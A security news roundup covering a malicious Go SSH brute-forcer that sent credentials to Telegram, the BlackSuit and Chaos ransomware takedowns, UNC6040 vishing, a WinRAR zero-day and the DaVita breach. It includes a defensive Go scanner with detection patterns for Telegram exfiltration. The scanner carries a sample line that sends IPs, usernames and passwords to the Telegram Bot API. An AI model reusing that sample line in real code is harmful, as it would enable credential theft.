Go Module Disguised as SSH Brute Forcer Steals Credentials via Telegram
Researchers have identified a malicious Go module on GitHub that masqueraded as a penetration testing tool but covertly exfiltrated harvested credentials to a Telegram bot. The tool’s distribution leveraged open-source community trust, increasing its potential reach within developer and security communities.
Background and Discovery
The module, named “Golang random IP SSH brute force,” appeared to offer brute-forcing of SSH credentials across random IPv4 addresses. Unlike legitimate offensive security tools, this module embedded credential exfiltration functionality that would send successful username and password combinations, along with their associated IP addresses, to a hardcoded Telegram bot operated by an unidentified threat actor. The primary distribution method was a now-discontinued GitHub account, from which unsuspecting users could download and run the tool, believing it to be benign.
Technical Mechanics
This Go module actively scanned random IPv4 addresses for open SSH services (specifically on TCP port 22). Using a bundled list of usernames and passwords, it conducted brute-force attempts to gain unauthorized access. Whenever successful, it immediately transmitted the credentials to the attacker’s Telegram channel. The module highlighted a trend of increasingly sophisticated supply chain attacks, where malicious actors seed widely used programming environments and repositories with backdoored packages targeting operational security lapses.
Security Implications
Such malicious modules underscore the dangers inherent in downloading and executing unverified code, particularly from unofficial or little-known sources. Threat actors not only gain access to breached systems but also assemble credential databases for broader attack automation, credential stuffing campaigns, or access resale. The use of Telegram as an exfiltration medium signifies a shift toward leveraging mainstream encrypted messaging platforms as covert command-and-control channels.
Recommendations
Security professionals and developers should verify the authenticity of open-source tools before usage, continuously monitor for suspicious outbound network traffic to Telegram and similar services, and enforce strict controls around the use of offensive security tooling in production environments. Regular code audits and restricting administrative privileges for such operations can mitigate the risks of credential leakage and supply chain tampering.
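One way to act on the verification and monitoring advice above: an added example (not code from the module or from the researchers) that audits Go source text for the Telegram exfiltration indicators described under Technical Mechanics. The three rule patterns and the embedded sample source are assumptions constructed for this illustration, not material from the actual module.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding records one indicator hit: source line, rule name, matched text.
type Finding struct{ Line int; Rule, Text string }

// Indicator rules (assumed patterns, not taken from the module itself): the Bot API
// host, a hardcoded bot token (numeric id, colon, 35-char secret) and a send* call.
var rules = []struct {
	name string
	re   *regexp.Regexp
}{
	{"telegram-api-host", regexp.MustCompile(`api\.telegram\.org`)},
	{"telegram-bot-token", regexp.MustCompile(`\d{8,10}:[A-Za-z0-9_-]{35}`)},
	{"telegram-send-method", regexp.MustCompile(`/bot.{0,80}?/send(Message|Document)`)},
}

// AuditGoSource scans source text line by line and returns every rule hit in
// source order, so a reviewer can inspect each one before trusting the package.
func AuditGoSource(src string) []Finding {
	var out []Finding
	for i, line := range strings.Split(src, "\n") {
		for _, r := range rules {
			if m := r.re.FindString(line); m != "" {
				out = append(out, Finding{Line: i + 1, Rule: r.name, Text: m})
			}
		}
	}
	return out
}

// sample is a constructed snippet imitating the reporting routine described
// above; the token is a placeholder, not a real credential.
var sample = "package main\n" +
	"import \"net/http\"\n" +
	"const token = \"123456789:" + strings.Repeat("X", 35) + "\"\n" +
	"func report(ip, user, pass string) {\n" +
	"\thttp.Get(\"https://api.telegram.org/bot\" + token + \"/sendMessage?chat_id=1&text=\" + ip + user + pass)\n" +
	"}\n"

func main() {
	for _, f := range AuditGoSource(sample) {
		fmt.Printf("line %d: %-22s %s\n", f.Line, f.Rule, f.Text)
	}
}
```

Run it over a vendored module tree with `filepath.Walk` before building; any hit in a tool that has no stated reason to talk to Telegram warrants a manual read of that file.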
Disruption of BlackSuit and Chaos Ransomware Infrastructures
A coordinated international law enforcement effort has dismantled the core infrastructure of the BlackSuit ransomware operation and seized millions in cryptocurrency from affiliates linked to related groups such as Chaos ransomware. These actions reflect intensified global momentum against ransomware and high-profile cyber extortion.
BlackSuit Takedown
Authorities from the U.S., U.K., Germany, the Netherlands, Ukraine, and other countries, supported by cybersecurity experts, seized the BlackSuit ransomware group’s data leak sites and negotiation portals. The operation involved a combination of technical interventions and on-the-ground investigative coordination to physically and digitally remove the infrastructure used for publishing stolen victim data and facilitating ransom payments.
Financial Seizures and Affiliate Disruption
In parallel, FBI agents seized over $2.3 million in Bitcoin from a wallet controlled by an affiliate of the Chaos ransomware group, which researchers believe is a rebranded iteration of BlackSuit. The wallet was linked to multiple extortion incidents, particularly targeting Texas-based organizations earlier in the year. Forensic blockchain analysis was crucial in tracking ransomware proceeds, eventually leading to a successful civil forfeiture action.
Technical Connection and Attribution
Technical research revealed significant overlaps in encryption routines and operational tooling between Chaos and BlackSuit, indicating lineage from the notorious Conti ransomware family. This demonstrates how ransomware groups consistently recycle infrastructure, techniques, and personnel following law enforcement pressure, leading to “rebranding” cycles rather than complete dissolution.
Operational and Strategic Implications
The success of these takedowns highlights the benefits of international public-private collaboration and the value of technical guidance from security researchers working alongside law enforcement. However, the persistence of ransomware, despite these disruptions, underscores the need for ongoing vigilance, better incident response planning, and defensive investment in detection and attribution capabilities.
Malicious Vishing Attack on Google Targets Salesforce Systems
UNC6040, an advanced criminal group, executed a sophisticated vishing (voice phishing) attack against Google to compromise its Salesforce environments. The campaign employed direct phone social engineering combined with technical payloads for persistent access.
Attack Vector and Social Engineering Tactics
The attackers impersonated legitimate Google IT personnel via targeted phone calls to employees with privileged Salesforce access. Victims were persuaded, under plausible pretexts, to install a custom application. This application, delivered during the active social engineering session, enabled the attackers to exfiltrate information and establish remote access.
Custom Python Tooling and Operational Security Measures
UNC6040 utilized bespoke Python scripts designed to evade detection and frustrate post-incident forensic analysis. These tools obfuscated their activity and hindered attribution by making the origin and flow of data less tractable.
Impact and Mitigation Outcome
Google’s rapid detection and incident response contained the breach, limiting exposure to information already publicly available, according to company statements. The attack illustrates the convergence of human social engineering with technical exploitation—an area that continues to challenge even the most mature security organizations.
WinRAR Zero-Day Actively Exploited Prior to Security Patch
WinRAR users were recently exposed to a severe zero-day vulnerability that allowed attackers to execute arbitrary code by tricking victims into opening specially crafted archive files. The exploit was actively traded and used before the vendor issued a security update.
Nature of the Vulnerability
The bug permitted execution of attacker-controlled code whenever a user processed a malicious WinRAR archive. While detailed technical specifics remain private due to ongoing mitigative efforts, it is known that the flaw was easy to trigger and required minimal interaction—usually opening a compromised file circulated via email or download.
Dark Web Trade and Exploitation Timeline
Intelligence reports indicated cybercriminal forums, particularly on the Russian dark web, were marketing the exploit as early as July. This rapid underground commodification enabled widespread exploitation before most users received or applied the vendor’s security patch.
Patching and User Guidance
WinRAR’s development team moved quickly to issue a fix in the latest release. Users are strongly encouraged to update immediately, as earlier versions remain vulnerable to effortless compromise. The incident demonstrates the ongoing risk posed by legacy, widely deployed utility software and the importance of timely security updates.
DaVita Dialysis Provider Suffers Massive Data Breach
DaVita, a major U.S. kidney dialysis provider, reported a substantial data breach in which nearly one million patients’ sensitive medical and financial records were compromised, including Social Security numbers and clinical information. The attack is attributed to the Interlock ransomware group.
Incident Overview and Timeline
The intrusion occurred between March 24 and April 12, 2025, targeting DaVita’s patient labs database. The attack began as a ransomware deployment but quickly shifted to data theft, with confirmation of unauthorized access to financial, clinical, and personal identifiers for 915,952 individuals.
Attack Attribution and Ransomware Group Tactics
The Interlock ransomware group claimed responsibility, boasting of stealing 1.5TB of sensitive data and providing samples to demonstrate access. DaVita only discovered the full scope of the breach weeks later, after attackers published select records online. Remediation and mitigation, bolstered by third-party experts, cost DaVita over $13 million and included both administrative and direct patient care expenses.
Regulatory and Customer Response
Following notification laws and best practices, DaVita informed all affected individuals and offered free credit monitoring. The breach contributes to an ongoing surge in healthcare sector attacks, despite evidence of slower ransomware growth rates in the industry overall for 2025.